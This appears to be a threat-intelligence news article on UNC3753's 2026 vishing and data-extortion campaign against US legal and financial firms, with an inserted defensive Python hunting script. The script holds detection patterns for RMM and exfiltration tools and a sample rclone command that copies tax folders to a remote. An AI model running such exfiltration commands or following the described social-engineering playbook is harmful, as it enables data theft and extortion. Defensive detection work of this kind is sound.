Cybersecurity experts have revealed details of a financially driven data theft and extortion operation that has hit dozens of organizations in the U.S. across professional, legal, and financial services sectors between January and May 2026.
Google Mandiant and Google Threat Intelligence Group (GTIG) have linked this activity to a threat actor known as UNC3753, also referred to as Chatty Spider, Luna Moth, and Silent Ransom Group (SRG).
“UNC3753 uses voice phishing (vishing) and social engineering tricks to gain remote access into corporate networks,” explained researchers Chad Reams, Tufail Ahmed, Keith Knapp, Ashley Frazer, and Tyler McLellan.
“By using pretexts like data migration or invoice-related emails, the attackers start phone calls pretending to be IT support and persuade targets to join screen-sharing sessions and install remote monitoring and management (RMM) tools.”
After gaining access, the attackers either directly search for and steal files of interest or trick the victim into doing it themselves. Stolen data includes confidential legal agreements, personally identifiable information (PII), and financial records.
In some cases the attackers have shown up in person at victims’ offices, a tactic the U.S. Federal Bureau of Investigation (FBI) warned about last month. In these in-person intrusions the attackers pose as IT technicians to get inside corporate offices and attempt to copy data onto removable USB drives.
“By sending someone in person to the victim’s location to help with the intrusion, SRG actors copy data to an external hard drive or USB drive plugged into the victim’s computer by the attacker,” the FBI noted regarding this new escalation in UNC3753’s tactics.
Google stated that UNC3753 shares tactical similarities with UNC2686, a threat group previously known for running BazarCall-style campaigns in 2021. While UNC3753 has been seen deploying LockBit Black ransomware in the past, since 2022 it has focused almost exclusively on extortion-only operations, pressuring victims to pay or risk having their data published on the LEAKEDDATA leak site.
Both UNC3753 and UNC2686 are believed to be offshoots of the now-defunct Conti ransomware gang, with early versions of the campaigns using subscription cancellation lures as part of callback phishing attacks designed to install remote access software on victims’ machines.

Starting around March 2025, the group has impersonated internal corporate IT help desk staff to talk victims into a screen-sharing session over Zoom or Microsoft Teams, or a Windows Quick Assist session, claiming to be addressing a security issue or assisting with a corporate data migration project. Because nothing malicious is ever delivered by email, the approach sidesteps the email security controls organizations typically rely on.
“The threat group often starts campaigns using harmless, invoice-themed email lures sent from attacker-controlled consumer email accounts,” Google explained. “These emails contain no active links or malicious attachments. Instead, they usually include a brief, generic message. The main goal of these emails is to set up a pretext, raising the target’s internal security concerns so they are more likely to respond to follow-up voice calls.”
Once a session is set up, the attackers try to maintain a persistent presence by guiding victims to install legitimate remote desktop software like AnyDesk, Bomgar, SuperOps RMM, or Zoho Assist. Instructions to install these programs are shared through a legitimate service called “privnote[.]com,” which allows users to send notes that self-destruct after being read by the recipient.
UNC3753 has also been observed setting up Zoom sessions directly on targets’ personal laptops to access corporate virtual desktop infrastructure (VDI) and dig deeper into corporate file systems, aiming to enumerate local and cloud directories, scan mapped network drives, and collect data from highly sensitive folders, including those related to tax filings, audits, corporate client agreements, and Social Security numbers (SSNs).
In the final stage, the stolen data is sent to the attackers via WinSCP or Rclone, or to email addresses controlled by the attacker from the target’s mailbox. This is followed by the attackers sending an extortion demand via email, typically within 30 minutes of leaving the target environment.
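The sequence described above, an unsanctioned remote-support tool appearing on a workstation followed within hours by WinSCP or Rclone, is something a SOC can hunt for in process-creation telemetry. The script below is an added example, not code from Google, Mandiant or the FBI. The event shape (a simplified Sysmon/EDR-style process-creation record) and the field names are assumptions; the tool indicators are the product names this article lists, matched as lowercase substrings because exact binary names vary between versions; the four-hour correlation window is an assumption based on the article's observation that data theft begins within an hour and the whole operation fits in a business day; and the sample events are constructed for the demonstration.

```python
"""Hunt for the RMM-then-exfil sequence in process-creation events.

Added example. The event records below are CONSTRUCTED and the field
layout, indicator substrings and 4-hour window are assumptions.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class ProcEvent:
    ts: datetime
    host: str
    user: str
    image: str      # full path of the created process
    cmdline: str
    parent: str     # parent process image name


# Remote-support/RMM products the article names, as lowercase substrings.
# Exact executable names differ per version (assumption: substring match on
# image path plus command line is good enough for a hunt, not a hard block).
RMM_INDICATORS = ("anydesk", "bomgar", "superops", "zohoassist", "za_connect", "quickassist")
# Exfiltration tooling the article names. Rclone is often renamed in the
# wild, so a production rule should also key on its characteristic arguments.
EXFIL_INDICATORS = ("winscp", "rclone")
WINDOW = timedelta(hours=4)   # assumption, see module docstring


def classify(ev: ProcEvent, sanctioned=()):
    """Return 'rmm', 'exfil' or None; anything on the sanctioned list is ignored."""
    text = f"{ev.image} {ev.cmdline}".lower()
    if any(s in text for s in sanctioned):
        return None
    if any(s in text for s in RMM_INDICATORS):
        return "rmm"
    if any(s in text for s in EXFIL_INDICATORS):
        return "exfil"
    return None


def hunt(events, sanctioned=()):
    """Correlate per host: an exfil tool launched within WINDOW of an
    unsanctioned RMM tool on the same host is the high-severity pattern."""
    findings = []
    rmm_by_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e.ts):
        kind = classify(ev, sanctioned)
        if kind == "rmm":
            rmm_by_host[ev.host].append(ev)
            findings.append({"severity": "medium", "rule": "unsanctioned_rmm",
                             "host": ev.host, "ts": ev.ts, "user": ev.user,
                             "image": ev.image})
        elif kind == "exfil":
            prior = [r for r in rmm_by_host[ev.host] if ev.ts - r.ts <= WINDOW]
            if prior:
                findings.append({"severity": "high", "rule": "rmm_then_exfil",
                                 "host": ev.host, "ts": ev.ts, "user": ev.user,
                                 "rmm_image": prior[-1].image,
                                 "exfil_cmdline": ev.cmdline})
            else:
                findings.append({"severity": "low", "rule": "exfil_tool",
                                 "host": ev.host, "ts": ev.ts, "user": ev.user,
                                 "image": ev.image})
    return findings


# Constructed sample telemetry (not real victim data).
SAMPLE_EVENTS = [
    ProcEvent(datetime(2026, 4, 14, 10, 2), "WS-FIN-07", "CORP\\jdoe",
              r"C:\Users\jdoe\Downloads\AnyDesk.exe", "AnyDesk.exe --install", "explorer.exe"),
    ProcEvent(datetime(2026, 4, 14, 10, 41), "WS-FIN-07", "CORP\\jdoe",
              r"C:\Users\jdoe\AppData\Local\Temp\rclone.exe",
              'rclone.exe copy "S:\\Tax\\2025" remote:drop -P', "cmd.exe"),
    # Help-desk machine running the company's sanctioned tool: must not alert.
    ProcEvent(datetime(2026, 4, 14, 9, 15), "WS-IT-01", "CORP\\helpdesk",
              r"C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.WindowsClient.exe",
              "ScreenConnect.WindowsClient.exe", "services.exe"),
    # RMM two days before the transfer tool: outside the window, separate findings.
    ProcEvent(datetime(2026, 4, 12, 16, 0), "WS-HR-03", "CORP\\asmith",
              r"C:\Users\asmith\Downloads\AnyDesk.exe", "AnyDesk.exe", "explorer.exe"),
    ProcEvent(datetime(2026, 4, 14, 9, 0), "WS-HR-03", "CORP\\asmith",
              r"C:\Program Files (x86)\WinSCP\WinSCP.exe", "WinSCP.exe", "explorer.exe"),
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS, sanctioned=("screenconnect",)):
        print(f["severity"].upper(), f["rule"], f["host"], f["ts"].isoformat(), f["user"])
```

Run against the sample, this yields one high finding (WS-FIN-07, AnyDesk followed 39 minutes later by Rclone), two medium findings for the AnyDesk installs, and one low finding for the isolated WinSCP launch; the help-desk host is silent because its tool is on the sanctioned list. The same correlation logic can be fed from a SIEM query instead of the inline list, and the article's other observable artefacts, DNS or proxy requests to privnote[.]com and outbound mail to external addresses from the victim's own mailbox, are natural additional signals to join on the same host and time window.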
The emails give victims a three-day deadline to start ransom negotiations. They also threaten to call and email target employees and external clients directly to inform them of the data breach if they do not respond, in addition to publishing all stolen information on the data leak site.
In many incidents investigated by Google’s threat intelligence and incident response teams, the entire operation from initial contact to data extortion is said to have taken place within a single business day. The fast-paced operational model is highlighted by the fact that the attackers begin data searches, staging, and theft in under an hour.
“Legal services firms are high-value targets for extortion actors. They hold concentrated collections of extremely sensitive client transaction files, merger and acquisition plans, client trade secrets, and corporate regulatory reports,” Google noted.
“Threat groups understand that legal entities face significant reputational and regulatory risks and may be highly motivated to resolve extortion situations quietly to protect their professional reputation. Threat actors recognize that targeting the human element—specifically using voice-guided social engineering—allows them to easily bypass strong technical defenses, web security gateways, and MFA configurations.”